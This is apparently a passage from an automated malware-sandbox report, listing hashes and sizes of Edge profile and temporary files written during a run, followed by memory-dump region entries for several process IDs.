e293de8344d2610c538d83f1ca13376db0f31de5

SHA256
b4585fd0c727f326ed301969263aa6ae79c8413d561160027afae82a621347e4

SHA512
ca45e33f276634eaeaef0394dab16abebf703578e7868348473f1b770fa669894b0dc452e272aef6eb9a601deef2517c80ad5ad20806cc6461223f2cb851a5f3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
57d5636cf19706fbbd7b4f22dd021e66

SHA1
4f8eade2a567064c8e2f711333f59d0c2f32ace9

SHA256
7ad1541c32bd8190e8e949d9c97a39fc65cb327f7f9f5eb23e5e888a2b94c023

SHA512
b755cc197864b65207dbcf79007ebb652bfee509f7118b03894900d9cb5223e81e82ea5ac943427b34c6272d568e9a3d5f9ee2c69862e09d123e89e3961d4b42

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
8ae85e5cf3f16b6f88fea75afff52ab0

SHA1
b5e295ed2ddf08be4d80d37a9ecd65c25df6e517

SHA256
d45c4ed2ae15c6079c37164fa5f36c8413ad19234f11bf698f0db413788e78d8

SHA512
3ab8a201e3d426262d40d00a4d9f37c323df95f2edcb3a1a831c081a64825f5cf5cd37e7f9b9ed38eda7e09989f7ba9f5f9146ee49929acd1d61f17058b0c4eb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\68a9cb95-f4b0-4d06-b367-59d2914792c4.tmp

Filesize
5KB

MD5
afa4763823e3473ddfca88a693d31704

SHA1
c43322e45171e5e97b6e262234895a7cddab2d6f

SHA256
f2961e098ca7fe755aaed14b947ae2028a506fc72c2ee57d886709b049465948

SHA512
10dad7a51688eb1c46f0f8f5e3509c7a7b9e24c28e0dd90312caa32f4e3e23ec11151fc1dd8c8bc83e57082664112178ba189519eafb656347ca170a16c88477

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
f54baec7e2b79b05f6ba63e07b62a930

SHA1
492ae9c7fcac83b64a3150d1cf690d68de2b1ef5

SHA256
c582bbf18ba35bb83443e7a603957daa6149029766e02644298d678c207b32b8

SHA512
6c443038bbe7caa3ffabfb0cd5a744b45f0cd5f4253911aac759a14268dc3fa92975b0d4f1ed3f2e79c30d0b85d9388cb689a940f2c9a127125cdb14f9084fd8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
ccbe2677256afed3a562b28fb6725a94

SHA1
2e061934c17afd2ab341d4a64015956f9b92d9a9

SHA256
1791d45d658e09a49466ee6853774238cd51dad418cfcdfc352ee4034fba3b91

SHA512
d670054b5bdb11d3f9dd871dbde136e827dfafcd0b56b240a7c6e59e7bb5a58418fae3c6a5ed9db75d2c7582ba2581887e3322a3cf6b41a10e2addc036499449

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1

Filesize
264KB

MD5
f50f89a0a91564d0b8a211f8921aa7de

SHA1
112403a17dd69d5b9018b8cede023cb3b54eab7d

SHA256
b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

SHA512
bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lxyt4q1n.3yn.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/544-74-0x0000000002DF0000-0x00000000031F0000-memory.dmp

Filesize
4.0MB

Download
memory/1596-62-0x0000000002860000-0x0000000002C60000-memory.dmp

Filesize
4.0MB

Download
memory/1596-69-0x00007FF9F5100000-0x00007FF9F5309000-memory.dmp

Filesize
2.0MB

Download
memory/1596-72-0x0000000077440000-0x0000000077692000-memory.dmp

Filesize
2.3MB

Download
memory/1596-52-0x00000000009F0000-0x00000000009F9000-memory.dmp

Filesize
36KB

Download
memory/1612-36-0x00000000056B0000-0x00000000056C0000-memory.dmp

Filesize
64KB

Download
memory/1612-51-0x0000000077440000-0x0000000077692000-memory.dmp

Filesize
2.3MB

Download
memory/1612-49-0x00007FF9F5100000-0x00007FF9F5309000-memory.dmp

Filesize
2.0MB

Download
memory/1612-33-0x0000000001100000-0x00000000011B2000-memory.dmp

Filesize
712KB

Download
memory/1612-34-0x00000000056D0000-0x0000000005762000-memory.dmp

Filesize
584KB

Download
memory/1612-35-0x0000000005660000-0x0000000005668000-memory.dmp

Filesize
32KB

Download
memory/1612-42-0x00000000058B0000-0x0000000005CB0000-memory.dmp

Filesize
4.0MB

Download
memory/1612-39-0x00000000058B0000-0x0000000005CB0000-memory.dmp

Filesize
4.0MB

Download
memory/2480-31-0x0000000001390000-0x00000000013A0000-memory.dmp

Filesize
64KB

Download
memory/2568-19-0x00000183AE900000-0x00000183AE90A000-memory.dmp

Filesize
40KB

Download
memory/2568-14-0x00007FF9D42F0000-0x00007FF9D4DB2000-memory.dmp

Filesize
10.8MB

Download
memory/2568-3-0x00000183AE8A0000-0x00000183AE8C2000-memory.dmp

Filesize
136KB

Download
memory/2568-4-0x00007FF9D42F0000-0x00007FF9D4DB2000-memory.dmp

Filesize
10.8MB

Download
memory/2568-22-0x00000183AE950000-0x00000183AE958000-memory.dmp

Filesize
32KB

Download
memory/2568-11-0x00007FF9D42F0000-0x00007FF9D4DB2000-memory.dmp

Filesize
10.8MB

Download
memory/2568-115-0x00007FF9D42F0000-0x00007FF9D4DB2000-memory.dmp

Filesize
10.8MB

Download
memory/2568-21-0x00000183AE940000-0x00000183AE948000-memory.dmp

Filesize
32KB

Download
memory/2568-20-0x00000183AE930000-0x00000183AE938000-memory.dmp

Filesize
32KB

Download
memory/2568-0-0x00007FF9D42F3000-0x00007FF9D42F5000-memory.dmp

Filesize
8KB

Download
memory/2568-13-0x00007FF9D42F3000-0x00007FF9D42F5000-memory.dmp

Filesize
8KB

Download
memory/2568-18-0x00000183AE910000-0x00000183AE92A000-memory.dmp

Filesize
104KB

Download
memory/2568-17-0x00000183AE890000-0x00000183AE89E000-memory.dmp

Filesize
56KB

Download
memory/2568-16-0x00007FF9D42F0000-0x00007FF9D4DB2000-memory.dmp

Filesize
10.8MB

Download
memory/2568-15-0x00007FF9D42F0000-0x00007FF9D4DB2000-memory.dmp

Filesize
10.8MB

Download
memory/3752-32-0x00000000014F0000-0x0000000001500000-memory.dmp

Filesize
64KB

Download
memory/4944-65-0x0000000077440000-0x0000000077692000-memory.dmp

Filesize
2.3MB

Download
memory/4944-57-0x0000000005690000-0x0000000005A90000-memory.dmp

Filesize
4.0MB

Download
memory/4944-63-0x00007FF9F5100000-0x00007FF9F5309000-memory.dmp

Filesize
2.0MB

Download
memory/4944-45-0x0000000005410000-0x0000000005420000-memory.dmp

Filesize
64KB

Download
memory/4944-23-0x0000000000400000-0x00000000004B2000-memory.dmp

Filesize
712KB

Download